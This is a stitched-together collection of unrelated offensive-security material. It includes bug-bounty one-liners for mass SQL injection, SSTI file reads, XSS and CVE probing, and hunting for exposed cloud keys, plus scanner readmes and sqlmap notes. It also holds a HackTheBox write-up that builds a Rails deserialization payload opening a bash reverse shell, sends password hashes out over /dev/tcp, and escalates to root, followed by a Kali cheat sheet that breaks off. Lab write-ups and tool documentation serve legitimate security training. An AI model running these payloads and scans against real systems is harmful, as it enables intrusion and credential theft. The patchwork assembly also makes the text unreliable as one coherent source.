'dmz\|api\|staging\|env\|v1\|stag\|prod\|dev\|stg\|test\|demo\|pre\|admin\|beta\|vpn\|cdn\|coll\|sandbox\|qa\|intra\|extra\|s3\|external\|back' ``` ### Find SQL injection at scale ```bash subfinder -d site.com -all -silent | waybackurls | sort -u | gf sqli > gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli.txt ``` ### Find open redirects at scale ```bash subfinder -d site.com -all -silent | waybackurls | sort -u | gf redirect | qsreplace 'https://example.com' | httpx -fr -title --match-string 'Example Domain' ``` ### Find SSTI at scale ```bash echo "domain" | subfinder -silent | waybackurls | gf ssti | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | parallel -j50 -q curl -g | grep "root:x" ``` ### Scanning top exploited vulnerabilities according to CISA ```bash subfinder -d site.com -all -silent | httpx -silent | nuclei -rl 50 -c 15 -timeout 10 -tags cisa -vv ``` ### Bruteforce subdomains ```bash subfinder -d site.com -all -silent | httpx -silent | hakrawler | tr "[:punct:]" "\n" | sort -u > wordlist.txt puredns bruteforce wordlist.txt site.com -r resolvers.txt -w output.txt ``` ### Finding Cross-Site Scripting (XSS) using KnoXSS API ```bash echo "domain" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss[.]me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIKNOXSS\""}' | sh ``` ### CVE-2021-31589 ```bash cat subs.txt | while read host do; do curl -sk "$host/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" | grep -qs '"><svg/onload=alert(document.domain)>' && echo "$host: Vuln" || echo "$host: Not Vuln"; done ``` ### CVE-2023-29489 ```bash subfinder -d target.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path 'cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaa' -mc 400 ``` ### Clean list of host, port, and version ```bash mkdir nmap; cat targets.txt | parallel -j 35 nmap {} -sTVC -host-timeout 15m -oN nmap/{} -p 22,80,443,8080 --open > /dev/null 2>&1; cd nmap; grep -Hari "/tcp" | tee -a ../services.txt; cd ../ ``` ### Waybackurls validator ```bash waybackurls http://example.com | grep "url" | xargs -n 1 curl -s -o /dev/null -w "%{http_code} > %{url_effective}\n" | sort ``` ### Extract endpoints from JS (Part 1) ```bash curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu ``` ### Extract endpoints from JS (Part 2) ```bash curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'" ``` ### Extract endpoints from JS (Part 3) ```bash curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\";curl -Lks \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\"" ``` ### Extract endpoints from JS (Part 4) ```bash curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\"" ``` ### Find Access Keys for IAM ```bash echo example.com | subfinder -silent -all | httpx -silent -path ".env",".mysql_history","echo $(echo $(</dev/stdin) | cut -d "." -f2).sql" -mc 200 -ports 80,443,8080,8443 | grep -E -i "AKIA[A-Z0-9]{16}" ``` ### Subdomain enumeration with Spyse API ```bash curl -XGET "https://api.sypse.com/v3/data/domain/subdomain?limit=100&offset=100&domain=example.com" -H "Accept: application/json" -H "Authorization: Bearer TOKEN_HERE" 2>/dev/null | jq '.data.items | .[] | .name' | sed -e 's/^"//' -e 's/"$//' | grep example.com ``` ## References - [ReconOne](https://twitter.com/ReconOne_) - [jdksec](https://twitter.com/jdksec/status/1236891532256575488) - [atikqur007](https://twitter.com/atikqur007/status/1253235713023320064) - [ofjaaah](https://twitter.com/ofjaaah/status/1532581839344394241) - [pikpikcu](https://twitter.com/sec715/status/1295216521501908992) - [gwen001](https://gist.github.com/gwen001/0b15714d964d99c740a7e8998bd483df) - [sazekodzeb](https://twitter.com/sazekodzeb/status/1535967868390711302) - [TheDarkSideOps](https://twitter.com/TheDarkSideOps/status/1310744404605501441)
#### 1. About - URL: `https://github.com/sullo/nikto` - Nikto web server scanner #### 2. Build ``` # git clone https://github.com/sullo/nikto && cd nikto # docker build -t nikto . ``` #### 3. Run ``` # docker run --rm -it nikto -h http://192.168.9.11:8080 # cat urls.txt | docker run --rm -it nikto -h - ```
# BugBounty.zip :beetle: :moneybag: Welcome to BugBounty.zip, a collection of tools aimed at making your bug hunting experience smoother and more efficient. ## Tools :wrench: Here's a brief overview of the tools BugBountyZIP provides: 1. **Add HTTPS:** Automatically adds HTTPS to domain list. 2. **Remove a Word:** Helps you delete specific words from your list. 3. **Replace a Word:** Allows you to replace specific words in your list. 4. **Remove Duplicates:** Removes duplicate entries in your list. 5. **Extract Endpoints:** Enables you to extract endpoints from your URL lists. 6. **Extract Parameters:** Helps to extract parameters from URL strings. 7. **Open Multiple URLs:** Opens multiple URLs at once. 8. **OTP Generator:** A one-time password generator tool. 9. **UltraSoundSource Scan:** Scans the input source code or JavaScript file to find endpoints, parameters, and domains. 10. **Append** a specific path to entered domains/URLs. 11. **Rapid-Hand** for faster payload injection. 12. **Hope** a tool to scan URLs for potential vulnerable parameters, with a focus on OWASP's top 25 vulnerabilities. 13. **Evidence** a screen recorder with audio and mic support. Recordings are saved directly to the user's local machine. ## Usage :computer: Simply navigate to [BugBounty.zip](https://BugBounty.zip) to start using the tools. ## Contribution :handshake: We welcome any contributions! If you wish to contribute, please create an issue to discuss what you would like to change or improve. ## Sponsors :money_with_wings: Your support means a lot to us. It helps us dedicate more time to maintaining this project and continue adding valuable tools. Check out the sponsorship tiers and consider becoming a sponsor. [!["Buy Me A Coffee"](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/BugBounty.ZIP) ## License :page_with_curl: This project is licensed under the MIT License. See `LICENSE` for more information.
# sql 注入 ## [sqlmap](https://github.com/sqlmapproject/sqlmap) > sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 使用方法 ``` python sqlmap.py -h ``` 使用demo ``` python sqlmap.py -u "http://someurl?name=a" --eval="sessionid='56782f23-2409-44dc-a603-215b3e24a164'" -v 4 python sqlmap.py -g "inurl:"weibo.com/ .php id=" ``` -v: * 0:只显示python错误以及严重的信息。 * 1:同时显示基本信息和警告信息。(默认) * 2:同时显示debug信息。 * 3:同时显示注入的payload。 * 4:同时显示HTTP请求。 * 5:同时显示HTTP响应头。 * 6:同时显示HTTP响应页面。
--- title: "CMSeeK" category: "scanner" type: "CMS" state: "released" appVersion: "v.1.1.3" usecase: "Automation of the process of detecting the Joomla CMS and its core vulnerabilities" --- <!-- SPDX-FileCopyrightText: the secureCodeBox authors SPDX-License-Identifier: Apache-2.0 --> <!-- .: IMPORTANT! :. -------------------------- This file is generated automatically with `helm-docs` based on the following template files: - ./.helm-docs/templates.gotmpl (general template data for all charts) - ./chart-folder/.helm-docs.gotmpl (chart specific template data) Please be aware of that and apply your changes only within those template files instead of this file. Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml` -------------------------- --> <p align="center"> <a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a> <a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Incubator Project" src="https://img.shields.io/badge/OWASP-Incubator%20Project-365EAA"/></a> <a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a> <a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a> </p> ## What is CMSeeK? CMSeeK is an open source penetration testing tool to automate the process of detecting various types of CMS and its installed extensions. Only the Joomla CMS is supported by secureCodeBox. CMSeeK has a database with known vulnerabilities. To learn more about the CMSeeK scanner itself, visit the CMSeeK GitHub repository [here](https://github.com/Tuhinshubhra/CMSeeK). ## Deployment The cmseek chart can be deployed via helm: ```bash # Install HelmChart (use -n to configure another namespace) helm upgrade --install cmseek secureCodeBox/cmseek ``` ## Scanner Configuration The CMSeeK targets are specified with the `-u` parameter. The target should be a URL. Additional CMSeeK scan features can be configured via the parameter attribute. Some useful example parameters listed below: - `-u URL, --url URL` : Target Url. - `--follow-redirect` : Follows all/any redirect(s). - `--no-redirect` : skips all redirects and tests the input target(s) - `-r, --random-agent`: Use a random user agent. - `--googlebot`: Use Google bot user agent. - `--user-agent USER_AGENT`: Specify a custom user agent ## Requirements Kubernetes: `>=v1.11.0-0` ## Values | Key | Type | Default | Description | |-----|------|---------|-------------| | cascadingRules.enabled | bool | `true` | Enables or disables the installation of the default cascading rules for this scanner | | parser.affinity | object | `{}` | Optional affinity settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) | | parser.env | list | `[]` | Optional environment variables mapped into each parseJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) | | parser.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images | | parser.image.repository | string | `"docker.io/securecodebox/parser-cmseek"` | Parser image repository | | parser.image.tag | string | defaults to the charts version | Parser image tag | | parser.scopeLimiterAliases | object | `{}` | Optional finding aliases to be used in the scopeLimiter. | | parser.tolerations | list | `[]` | Optional tolerations settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) | | parser.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | | scanner.activeDeadlineSeconds | string | `nil` | There are situations where you want to fail a scan Job after some amount of time. To do so, set activeDeadlineSeconds to define an active deadline (in seconds) when considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup) | | scanner.affinity | object | `{}` | Optional affinity settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) | | scanner.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) | | scanner.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) | | scanner.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) | | scanner.extraVolumeMounts | list | `[]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scanner.extraVolumes | list | `[]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scanner.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images | | scanner.image.repository | string | `"docker.io/securecodebox/scanner-cmseek"` | Container Image to run the scan | | scanner.image.tag | string | `nil` | defaults to the charts appVersion | | scanner.nameAppend | string | `nil` | append a string to the default scantype name. | | scanner.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) | | scanner.securityContext | object | `{"allowPrivilegeEscalation":false,"capabilities":{"drop":["all"]},"privileged":false,"readOnlyRootFilesystem":false,"runAsNonRoot":true}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) | | scanner.securityContext.allowPrivilegeEscalation | bool | `false` | Ensure that users privileges cannot be escalated | | scanner.securityContext.capabilities.drop[0] | string | `"all"` | This drops all linux privileges from the container. | | scanner.securityContext.privileged | bool | `false` | Ensures that the scanner container is not run in privileged mode | | scanner.securityContext.readOnlyRootFilesystem | bool | `false` | Prevents write access to the containers file system | | scanner.securityContext.runAsNonRoot | bool | `true` | Enforces that the scanner image is run as a non root user | | scanner.tolerations | list | `[]` | Optional tolerations settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) | | scanner.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | ## License [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) Code of secureCodeBox is licensed under the [Apache License 2.0][scb-license]. [scb-owasp]: https://www.owasp.org/index.php/OWASP_secureCodeBox [scb-docs]: https://docs.securecodebox.io/ [scb-site]: https://www.securecodebox.io/ [scb-github]: https://github.com/secureCodeBox/ [scb-twitter]: https://twitter.com/secureCodeBox [scb-slack]: https://join.slack.com/t/securecodebox/shared_invite/enQtNDU3MTUyOTM0NTMwLTBjOWRjNjVkNGEyMjQ0ZGMyNDdlYTQxYWQ4MzNiNGY3MDMxNThkZjJmMzY2NDRhMTk3ZWM3OWFkYmY1YzUxNTU [scb-license]: https://github.com/secureCodeBox/secureCodeBox/blob/master/LICENSE
![](jewel_banner.png) <p align="right"> <a href="https://www.hackthebox.eu/home/users/profile/391067" target="_blank"><img loading="lazy" alt="x00tex" src="https://www.hackthebox.eu/badge/image/391067"></a> </p> # Scanning ## Nmap `ports=$(sudo nmap -p- --min-rate=1000 "$1" | grep open | awk -F / '{print $1}' ORS=',') && sudo nmap -p$ports -sV -sC -oN nmap.txt "$1"` ```bash PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA) | 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA) |_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519) 8000/tcp open http Apache httpd 2.4.38 |_http-generator: gitweb/2.20.1 git/2.20.1 | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Apache/2.4.38 (Debian) | http-title: 10.10.10.211 Git |_Requested resource was http://10.10.10.211:8000/gitweb/ 8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6) |_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6 |_http-title: BL0G! ``` * Port 8080 is a BLOG! webapp and port 8000 containts the source code of the webapp. * we can greb the git repo from `http://10.10.10.211:8000/gitweb/?p=.git;a=snapshot;h=5d6f436256c9575fbc7b1fb9621b18f0f8656741;sf=tgz` master commit snapshot. * get `git-5d6f436.tar.gz` archive file. ## source code enumerating * extracting the archive `❯ tar -xvzf git-5d6f436.tar.gz` ❯ tree .git-5d6f436 ├── app | ... [snip] ... | ├── bd.sql ... [snip] ... 47 directories, 116 files * Found 2 usernames and password hashes in `bd.sql` file ❯ grep -E "bill"\|"jennifer" bd.sql 1 bill [email protected] 2020-08-25 08:13:58.662464 2020-08-25 08:13:58.662464 $2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW 2 jennifer [email protected] 2020-08-25 08:54:42.8483 2020-08-25 08:54:42.8483 $2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy * hashes are not crackable. * this webapp written in ruby and there is a tool that can scan for potential vulnerabilities in ruby project - [brakeman](https://brakemanscanner.org/) * but the tool don't find any useful vulnerabilities. * viewing the gemfile which contains all require dependencies for the project found the ruby rail version: ❯ grep -n rail Gemfile 7:gem 'rails', '= 5.2.2.1' * viewing the [release notes](https://weblog.rubyonrails.org/releases/) this version is released on March 13, 2019 and there is a de-serialization vulnerability in the rails < 5.2.4.3, rails < 6.0.3.1 **CVE-2020-8165:** A de-serialization of untrusted data vulnerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to un-marshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE. **Exploit PoC:** [[email protected]](https://github.com/masahiro331/CVE-2020-8165) * rail [May 18, 2020](https://weblog.rubyonrails.org/2020/5/18/Rails-5-2-4-3-and-6-0-3-1-have-been-released/) release address this issue and from here found detailed document for this [exploit](https://groups.google.com/g/rubyonrails-security/c/bv6fW4S0Y1c?pli=1) * what this report says is that - There is potentially unexpected behavior in the MemCacheStore and RedisCacheStore where, when untrusted user input is written to the cache store using the `raw: true` parameter, re-reading the result from the cache can evaluate the user input as a Marshalled object instead of plain text. Vulnerable code looks like: data = cache.fetch("demo", raw: true) { untrusted_string } * verifying this in our code: ❯ grep -r 'raw: true' app/controllers/application_controller.rb: @current_username = cache.fetch("username_#{session[:user_id]}", raw: true) do app/controllers/users_controller.rb: @current_username = cache.fetch("username_#{session[:user_id]}", raw: true) {user_params[:username]} ❯ sed -n 32,49p app/controllers/users_controller.rb def update @user = User.find(params[:id]) if @user && @user == current_user cache = ActiveSupport::Cache::RedisCacheStore.new(url: "redis://127.0.0.1:6379/0") cache.delete("username_#{session[:user_id]}") @current_username = cache.fetch("username_#{session[:user_id]}", raw: true) {user_params[:username]} if @user.update(user_params) flash[:success] = "Your account was updated successfully" redirect_to articles_path else cache.delete("username_#{session[:user_id]}") render 'edit' end else flash[:danger] = "Not authorized" redirect_to articles_path end end ❯ sed -n 29,40p app/controllers/application_controller.rb def current_username if session[:user_id] cache = ActiveSupport::Cache::RedisCacheStore.new(url: "redis://127.0.0.1:6379/0") @current_username = cache.fetch("username_#{session[:user_id]}", raw: true) do @current_user = current_user @current_username = @current_user.username end else @current_username = "guest" end return @current_username end * viewing the code it is clear that somewhere in the username update field is vulnerable for this exploit. # User Exploiting * If we go to 10.10.10.211:8080 there is a signup option and create an account and go to profile there is a username update option `http://10.10.10.211:8080/users/19/edit` ![](screenshots/username.png) * Found the vulnerability and its location now time to exploit it. * For exploiting it we need to install rail console to create payload that specified in the PoC: * install the same Rail version that is vulnerable for this exploit. * starting console: $ bundle exec rails console irb(main):> * Creating Payload ```ruby code = '`/bin/bash -c "bash -i &>/dev/tcp/{IP}/4141 0>&1"`' erb = ERB.allocate erb.instance_variable_set :@src, code erb.instance_variable_set :@filename, "1" erb.instance_variable_set :@lineno, 1 payload Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result) puts "Payload" require 'uri' puts URI.encode_www_form(payload: payload) ``` this give us usr encoded payload. <!-- %04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%3A%60bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.15.71%2F4141+0%3E%261%22%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T --> * start netcat, intercept the username update request in burp, past payload in username field and forward the request and then refresh the page and payload get execute and we get shell. ![](screenshots/jewel-foothold.GIF) # Privilege Escalation * Running linpeas with `-a` one funny thing happened i get sudo password of user bill: ![](screenshots/linpeas-bruteforce.png) * but i don't thing that this is the intentional way. * digging more i found a unusual file in `/var/backups/` dump_2020-08-27.sql. (remote) [email protected]:/var/backups$ grep -E "bill"\|"jennifer" dump_2020-08-27.sql 2 jennifer [email protected] 2020-08-27 05:44:28.551735 2020-08-27 05:44:28.551735 $2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO 1 bill [email protected] 2020-08-26 10:24:03.878232 2020-08-27 09:18:11.636483 $2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW * these hashes are diffrent form last time and when try to crack them i successfully crack bill hash and get the same password that linpeas cracked. (remote) [email protected]:/var/backups$ grep -E "bill"\|"jennifer" dump_2020-08-27.sql | awk '{print $2":"$8}' > /dev/tcp/10.10.15.71/4141 ❯ nc -nvlp 4141 > hashes listening on [any] 4141 ... connect to [10.10.15.71] from (UNKNOWN) [10.10.10.211] 41058 ❯ cat hashes jennifer:$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO bill:$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW ❯ john hashes -w=/usr/share/wordlists/rockyou.txt <snip> ❯ john hashes --show bill:spongebob 1 password hash cracked, 1 left # Root * running `sudo -l` with user bill password asking for `Verification code`. (remote) [email protected]:/home/bill$ sudo -l [sudo] password for bill: Verification code: You type like I drive. [sudo] password for bill: Verification code: Take a stress pill and think things over. [sudo] password for bill: Verification code: sudo: 3 incorrect password attempts * google tells me that sudo also have 2FA and that is enable here. found on this [article](https://www.linux.com/topic/desktop/how-set-2-factor-authentication-login-and-sudo/) * this article tells that sudo 2AF use `pam_google_authenticator.so`, and this module create a secret totp key file named `.google_authenticator` that use to create OTP. * this file present in bill home folder. * from this module's [git repo](https://github.com/google/google-authenticator-libpam) that this file `.google_authenticator` created when configuring 2FA and use as a secret for generating OTP auth required pam_google_authenticator.so secret=${USER}/.google_authenticator * And bill home folder `.google_authenticator` file contains the totp code that use to create OTP: (remote) [email protected]:/home/bill$ cat .google_authenticator 2UQI3R52WFCLE6JTLDCSJYMJH4 " WINDOW_SIZE 17 " TOTP_AUTH * we can use that same code in any Oauth app to create that Verification code for sudo. i use this chrome [authenticator](https://chrome.google.com/webstore/detail/authenticator/bhghoamapcdpbohphigoooaddinpkbai?hl=en) addon * but success is not that easy, because in 2FA depend on clock time and if both ends time is different while generating code it never works. * spend so much time try to sync with the box time and then found [oathtool](https://packages.debian.org/sid/oathtool) that run from terminal and create OTP using totp code. * My technique is to upload the oathtool in the box and run form the box so that i don't need to sync box time and my machine time because i'm running on same box. * but this is not easy because oathtool is not a single executable binary file, it depends on some Shared libraries and while running the oathtool binary it give an error of missing library: (remote) [email protected]:/home/bill$ ./oathtool ./oathtool: error while loading shared libraries: liboath.so.0: cannot open shared object file: No such file or directory * this binary expecting this: ❯ whereis liboath.so.0 liboath.so: /usr/lib/x86_64-linux-gnu/liboath.so.0 ❯ ls -la /usr/lib/x86_64-linux-gnu/liboath.so.0 lrwxrwxrwx 1 root root 16 Feb 4 13:37 /usr/lib/x86_64-linux-gnu/liboath.so.0 -> liboath.so.0.1.3 * But this is not available in the box. * So, to run oathtool successfully in the box we need to do some things before run it: 1. upload `liboath.so.0.1.3` library in the box, found [here](https://packages.debian.org/sid/liboath0) 2. Create its symbolic link as liboath.so.0, learn about sym-links [here](https://linuxize.com/post/how-to-create-symbolic-links-in-linux-using-the-ln-command/) 3. set `LD_LIBRARY_PATH` to `liboath.so.0.1.3` library location. 4. run it. * upload both files in the bill's home folder: (remote) [email protected]:/home/bill$ ls -l -rw-r--r-- 1 bill bill 83960 Feb 20 10:04 liboath.so.0.1.3 -rwxr-xr-x 1 bill bill 80512 Feb 20 09:53 oathtool * create symbolic link: (remote) [email protected]:/home/bill$ ln -s liboath.so.0.1.3 liboath.so.0 (remote) [email protected]:/home/bill$ ls -l lrwxrwxrwx 1 bill bill 16 Feb 20 10:07 liboath.so.0 -> liboath.so.0.1.3 * setting `LD_LIBRARY_PATH` path to current folder: (remote) [email protected]:/home/bill$ LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/bill (remote) [email protected]:/home/bill$ export LD_LIBRARY_PATH * running: (remote) [email protected]:/home/bill$ ./oathtool -V oathtool (OATH Toolkit) 2.6.6 Copyright (C) 2009-2021 Simon Josefsson. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Written by Simon Josefsson. * Now the last thing is to generate code and check if it works. * code generated successfully: (remote) [email protected]:/home/bill$ ./oathtool -b --totp '2UQI3R52WFCLE6JTLDCSJYMJH4' 015396 * now time to send this code to sudo: (remote) [email protected]:/home/bill$ ./oathtool -b --totp '2UQI3R52WFCLE6JTLDCSJYMJH4' && sudo -l 627580 [sudo] password for bill: Verification code: Matching Defaults entries for bill on jewel: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, insults User bill may run the following commands on jewel: (ALL : ALL) /usr/bin/gem * And successfully execute sudo command. # Root Exploting * User can run `/usr/bin/gem` as any user with sudo: **exploit:** `sudo /usr/bin/gem open -e "/bin/bash -c /bin/bash" rdoc` From [gtfobins](https://gtfobins.github.io/gtfobins/gem/) (remote) [email protected]:/home/bill$ sudo /usr/bin/gem open -e "/bin/bash -c /bin/bash" rdoc root@jewel:/usr/lib/ruby/gems/2.5.0/gems/rdoc-6.0.1# id uid=0(root) gid=0(root) groups=0(root)
<h1>Kali Linux - https://kali.org/downloads</h1> <h2>Recon and Enumeration</h2> <h3>NMAP Commands</h3> <p>Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>nmap -v -sS -A -T4 target</td> <td>Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services</td> </tr> <tr> <td>nmap -v -sS -p–A -T4 target</td> <td>As above but scans all TCP ports (takes a lot longer)</td> </tr> <tr> <td>nmap -v -sU -sS -p- -A -T4 target</td> <td>As above but scans all TCP ports and UDP scan (takes even longer)</td> </tr> <tr> <td>nmap -v -p 445 –script=smb-check-vulns<br> –script-args=unsafe=1 192.168.1.X</td> <td>Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover</td> </tr> <tr> <td>ls /usr/share/nmap/scripts/* | grep ftp</td> <td>Search nmap scripts for keywords</td> </tr> </tbody> </table> <h2>SMB enumeration</h2> <p>In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS, /ˈsɪfs/), operates as an application-layer network protocol mainly used 